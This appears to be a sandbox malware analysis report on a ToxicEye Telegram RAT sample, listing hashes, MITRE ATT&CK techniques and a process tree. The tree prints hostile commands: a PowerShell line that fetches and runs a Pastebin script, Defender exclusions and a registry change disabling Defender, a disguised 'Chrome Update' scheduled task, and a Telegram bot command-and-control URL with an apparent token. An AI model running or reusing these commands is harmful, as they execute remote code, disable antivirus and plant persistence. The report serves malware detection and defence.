toxiceye | 43eca90ecc5958fd358a9240f31b1811ad2d01c6db10397cfd88e445ff8be5e0

Analysis

max time kernel
599s
max time network
600s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
05-01-2025 12:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TelegramRAT.exe
Size

119KB
MD5

47436ad8508cbdbede6535db163766bc
SHA1

c6c6f8eb7dac9f294da1547e30c320a7d316bf52
SHA256

43eca90ecc5958fd358a9240f31b1811ad2d01c6db10397cfd88e445ff8be5e0
SHA512

255a5618cf57a4930e08e02628bef7533289e2968fcf0d1db617447f7c04245978fc9d83c29247ffd9478a5428a3491a28458bcb2eb05efb0a4566ad43bf5a9c
SSDEEP

3072:gAWfRzlXCwwFwOwWAmm+G/bxqH8QW8zCrAZu/tM1:gAD1SWHe/bg/p

Score

10^/10

toxiceye discovery evasion execution rat trojan

Malware Config

Extracted

Family

toxiceye

https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/sendMessage?chat_id=8130842755

Signatures

ToxicEye
ToxicEye is a trojan written in C#.
rat trojan toxiceye
Toxiceye family
toxiceye

Blocklisted process makes network request 4 IoCs

flow	pid	Process
71	3728	powershell.exe
72	3728	powershell.exe
75	3728	powershell.exe
77	3728	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2300	powershell.exe
1632	powershell.exe
3684	powershell.exe
4556	powershell.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	TelegramRAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	rat.exe

Executes dropped EXE 2 IoCs

pid	Process
4288	rat.exe
2708	PngMbrBuilder.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
77	raw.githubusercontent.com
70	pastebin.com
72	pastebin.com
76	raw.githubusercontent.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
3960	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4784	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3824	schtasks.exe
2156	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4288	rat.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe
4288	rat.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	2220	TelegramRAT.exe
Token: SeDebugPrivilege	3960	tasklist.exe
Token: SeDebugPrivilege	4288	rat.exe
Token: SeDebugPrivilege	4288	rat.exe
Token: SeDebugPrivilege	3728	powershell.exe
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe
2756	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4288	rat.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2220 wrote to memory of 2156	2220	TelegramRAT.exe	84
PID 2220 wrote to memory of 2156	2220	TelegramRAT.exe	84
PID 2220 wrote to memory of 396	2220	TelegramRAT.exe	86
PID 2220 wrote to memory of 396	2220	TelegramRAT.exe	86
PID 396 wrote to memory of 3960	396	cmd.exe	88
PID 396 wrote to memory of 3960	396	cmd.exe	88
PID 396 wrote to memory of 4240	396	cmd.exe	89
PID 396 wrote to memory of 4240	396	cmd.exe	89
PID 396 wrote to memory of 4784	396	cmd.exe	90
PID 396 wrote to memory of 4784	396	cmd.exe	90
PID 396 wrote to memory of 4288	396	cmd.exe	91
PID 396 wrote to memory of 4288	396	cmd.exe	91
PID 4288 wrote to memory of 3824	4288	rat.exe	93
PID 4288 wrote to memory of 3824	4288	rat.exe	93
PID 4288 wrote to memory of 1492	4288	rat.exe	103
PID 4288 wrote to memory of 1492	4288	rat.exe	103
PID 4288 wrote to memory of 1656	4288	rat.exe	105
PID 4288 wrote to memory of 1656	4288	rat.exe	105
PID 4288 wrote to memory of 112	4288	rat.exe	107
PID 4288 wrote to memory of 112	4288	rat.exe	107
PID 4288 wrote to memory of 2340	4288	rat.exe	111
PID 4288 wrote to memory of 2340	4288	rat.exe	111
PID 4288 wrote to memory of 2756	4288	rat.exe	113
PID 4288 wrote to memory of 2756	4288	rat.exe	113
PID 2756 wrote to memory of 4252	2756	msedge.exe	114
PID 2756 wrote to memory of 4252	2756	msedge.exe	114
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115
PID 2756 wrote to memory of 1456	2756	msedge.exe	115

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe
"C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2220
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2156
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpA0E3.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpA0E3.tmp.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:396
- - C:\Windows\system32\tasklist.exe
    Tasklist /fi "PID eq 2220"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:3960
- - C:\Windows\system32\find.exe
    find ":"
    3⤵
    PID:4240
- - C:\Windows\system32\timeout.exe
    Timeout /T 1 /Nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:4784
- - C:\Users\ToxicEye\rat.exe
    "rat.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4288
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3824
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c <ipconfig>
      4⤵
      PID:1492
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c <powershell "irm "pastebin.com/raw/1nfKw4aY" | iex">
      4⤵
      PID:1656
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c <powershell "irm "pastebin.com/raw/1nfKw4aY" | iex">
      4⤵
      PID:112
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c < powershell "irm "pastebin.com/raw/1nfKw4aY" | iex ">
      4⤵
      PID:2340
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/home
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:2756
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff86e7346f8,0x7ff86e734708,0x7ff86e734718
        5⤵
        
        PID:4252
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,15193134281919030249,6432637579005925367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 /prefetch:2
        5⤵
        
        PID:1456
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,15193134281919030249,6432637579005925367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
        5⤵
        
        PID:1196
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,15193134281919030249,6432637579005925367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
        5⤵
        
        PID:812
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15193134281919030249,6432637579005925367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
        5⤵
        
        PID:3780
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15193134281919030249,6432637579005925367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
        5⤵
        
        PID:3428
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15193134281919030249,6432637579005925367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1
        5⤵
        
        PID:844
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,15193134281919030249,6432637579005925367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:8
        5⤵
        
        PID:4776
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,15193134281919030249,6432637579005925367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:8
        5⤵
        
        PID:3044
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15193134281919030249,6432637579005925367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
        5⤵
        
        PID:1080
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15193134281919030249,6432637579005925367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
        5⤵
        
        PID:2112
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15193134281919030249,6432637579005925367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1
        5⤵
        
        PID:4944
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15193134281919030249,6432637579005925367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
        5⤵
        
        PID:5060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,15193134281919030249,6432637579005925367,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4568 /prefetch:2
        5⤵
        
        PID:2636
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c powershell "irm "pastebin.com/raw/1nfKw4aY" | iex"
      4⤵
      PID:4608
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm "pastebin.com/raw/1nfKw4aY" | iex"
        5⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:3728
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath '%TEMP%'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1632
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionProcess powershell.exe
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3684
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionProcess Lnk.exe
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4556
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionProcess svchost.exe
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2300
      - C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        6⤵
        
        PID:3940
      - C:\Users\Admin\AppData\Local\Temp\PngMbrBuilder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PngMbrBuilder.exe"
        6⤵
        Executes dropped EXE
        
        PID:2708

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3664

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
36988ca14952e1848e81a959880ea217

SHA1
a0482ef725657760502c2d1a5abe0bb37aebaadb

SHA256
d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6

SHA512
d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fab8d8d865e33fe195732aa7dcb91c30

SHA1
2637e832f38acc70af3e511f5eba80fbd7461f2c

SHA256
1b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea

SHA512
39a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
3dcb7c6270e669254a4c455750d58b5a

SHA1
984c98356371ff9011164fa19c58ba744d68fda5

SHA256
171fcbf0815ddf835c01d4c295043fd9ae197caeefe0543b41619acdf3bfe599

SHA512
ce6d0c6f3f9573d3221381f35857dc2c583eb3face9b9d711664c2f4ff183194c2c888baf7dd86c50a55e6b0953967dde92fb251cc68458ad0d2e4c3bed21d57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
317B

MD5
ddc85b4113c92b5059298633fd781081

SHA1
735ca7f963f8d7aacfe467da239224877df689d1

SHA256
af5c682a3acfb11a3075ef0ac589bfdeb630d63fabce2dc57c9b3a01e0648355

SHA512
91bee0a5bdce341693b47dbd7f82786c50878b33638b20a3b0d111624764d18f1cdcfc8d2d0daa40c276a5dbd6635e2bf28713d6eee909d2df2620523abad8ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
835c1ed0756c73f2c827abc057c157f0

SHA1
fe95b23d5dc430b4c30afd56f000d276d4d3bf8e

SHA256
28248b01ff8c4a6807631e899a54d1c6dff022ac77399f6da3e03e5f6806b2f8

SHA512
7d57b9e778ce9869fd33c15f560850f6b22b9832c74ed9a83cfd6bc6d89b8f0c55969a65f08789b92569a08933787662a1b044db8d12708793faa38082e8d0c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
dfb5177cf9b43ba65392e8ced2e64864

SHA1
ed6f54cc1870a442385809dcfff2a2886a1ad0d0

SHA256
439919c005eed2d2cdf84664f5677c4bbe6e6da97a3a5927bbf54a3667057fa1

SHA512
a5d3f40b9a699f1a08a91a6ddad08c5ca4bbf5ec619a2531bd218834af494b1df7219ee2ddec4b6ba6e8e14966ee13701621231612e8e183ef381e566f1b4613

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
6e9e26ed530509a04e03bb3624d3ae76

SHA1
d0fb817779f13e19ba1455e984a33c6f79e334bc

SHA256
b6f9c34e0d9f232a08f796f35da2234be525d30a8a74bd4cf35ea2b50ba780b5

SHA512
2309dc7918bc42cdff6d48ef05a9dbf4343372ea4ce4ef36a3bfa2553fcdcfeb06554832cbcd102bffc4332432b52af54677a06e398e6503a9d07742c7edbddb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ecceac16628651c18879d836acfcb062

SHA1
420502b3e5220a01586c59504e94aa1ee11982c9

SHA256
58238de09a8817ed9f894ed8e5bf06a897fd08e0b0bd77e508d37b2598edd2a9

SHA512
be3c7cb529cafb00f58790a6f8b35c4ff6db9f7f43a507d2218fd80cebc88413e46f71b1bc35b8afcc36b68f9409c946470d1e74a4fe225400eeb6f3f898f5b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
65a68df1062af34622552c4f644a5708

SHA1
6f6ecf7b4b635abb0b132d95dac2759dc14b50af

SHA256
718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35

SHA512
4e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
8ab6456a8ec71255cb9ead0bb5d27767

SHA1
bc9ff860086488478e7716f7ac4421e8f69795fb

SHA256
bcb14f15fbe23bf51a657c69b24f09cd51e33a2530f89ad17c44f660769611e2

SHA512
